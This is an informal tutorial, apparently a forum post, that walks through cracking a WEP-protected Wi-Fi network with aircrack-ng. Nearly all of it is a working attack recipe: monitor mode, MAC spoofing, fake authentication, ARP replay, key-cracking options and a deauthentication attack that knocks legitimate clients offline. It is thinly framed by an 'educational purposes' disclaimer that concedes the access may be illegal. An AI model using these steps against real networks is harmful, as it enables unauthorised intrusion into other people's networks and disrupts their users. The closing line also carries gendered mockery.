1.) Start monitor mode:
airmon-ng
Copy down interface
airmon-ng start (interface)
If it says "mon0" or"wifi0" is used, this is your new interface
If it says other things are running, type "kill (PID#)" for each
2.) Injection test:
aireplay-ng -9 (interface)
The APs
that send pings back can be injectedCopy down your targets BSSID, channel & ESSID
aireplay-ng -9 -e (ESSID) -a (BSSID) (interface)
This lets you test specifically, can beuseful for verifying hidden SSIDs
or alternative BSSIDs
3.) Target a specific channel:
airmon-ng start (interface) (channel)
4.) Change MAC:
airmon-ng stop (interface(s)
ifconfig (interface) down
macchanger--mac (faked:mac) (interface)
Copy down faked:mac5.) Begin packet capture:
airodump-ng -c (channel) -w (dump-name) --bssid (BSSID) (new interface)
Keep an eye out for authenticating client’s
MACs
under StationIf found & step 6 isn’t going well, go back to step 4 and use that MAC
You may have to stop the monitoring interface & the physical one
6.) Fake authentication:
- Put in second shell*
aireplay-ng -1 0 -a (BSSID) -h (faked:mac) (interface)
Successful authentication will continually send keep-alive packets
Using "aireplay-ng -1 6000 -o 1 -q 10 -a (BSSID) -h (faked:mac) (interface)" may help for picky routers
7.) ARP replay:
- Put in third shell*
aireplay-ng -3 -b (BSSID) -h (faked:mac) (interface)
8.) Crack WEP key:
- Put in a fourth shell*
aircrack-ng -b (BSSID) (dump-name)-01.cap
Minimum around 10,000 to 20,000
IVs
are needed to crack a 64-bit key & about 40,000 to 85,000 for 128-bitTry "aircrack-ng -n 64 (dump-name)*cap"every 10,000
IVs
If you know the start of the key in hexadecimal, try running "-d #" where # is the beginning characters
If key bytes are all numbers, try running with "-t" to assume an all numeric key
Add -x2 to brute force the last 2 bytes
If you reach 2,000,000, try changing the fudge factor to "-f 4" & run 30 minutes to an hour
Retry with the fudge factor increased by4 more if that’s unsuccessful
If key bytes all start with similar numbers, try running with "-h" to assume an all ASCII key
Add -x if trying with very few
IVs
to prevent brute forcing the last 2 bytes- Other attack methods:
Injection attack with 2 wireless cards:
aireplay -9 -i (receiving interface) (injecting interface)
If fails on Attack -5, make sure the injection interface MAC matches the current card MAC
Deauthentication attack:
aireplay-ng --deauth 5 -a (BSSID) -c (faked:mac) (interface)
Can be faster than an ARP replay, but you must know an authenticated client's MAC who’s online
This will disconnect the authenticated client, so they may be suspect
Fair warning
Depending on where you are on this beautiful planet, connecting to someone else's wifi may or may not be entirely legal. The instructions above are merely for educational purposes (one can always test the security or lack thereof of one's own network). As it was mentioned at the beginning, this was the manly man's way. For the girly sissy way, go to youtube and look up gerix-wifi-cracker. It's made everything way easier. :)